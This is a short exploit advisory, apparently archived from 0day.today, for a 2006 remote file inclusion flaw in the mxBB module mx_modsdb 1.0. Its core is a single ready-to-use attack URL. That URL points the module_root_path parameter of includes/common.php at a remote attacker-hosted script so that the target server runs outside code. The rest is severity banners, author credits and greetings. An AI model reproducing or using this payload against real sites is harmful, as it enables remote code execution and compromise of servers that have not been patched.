id: 1254
date: 12/12/2006
title: mxBB Module mx_modsdb 1.0 Remote File Include Vulnerability
author: Lu7k
cves: 

===========================================================
mxBB Module mx_modsdb 1.0 Remote File Include Vulnerability
===========================================================



mx_modsdb v.1.0.0 (common.php) Remote Inclusion Vulnerability


**************************************************************
Critical Level : Dangerous
**************************************************************
Bugfounder: Lu7k
**************************************************************

-----------------------------------------------------------------------------

Code:http://[target]/[patH]/includes/common.php?module_root_path=http://Ev!LScr!pt.txt

-----------------------------------------------------------------------------

************************************ 
Greetings: Bdrok - TheJT - MyMaster  
************************************ 



#  0day.today [2023-03-25]  #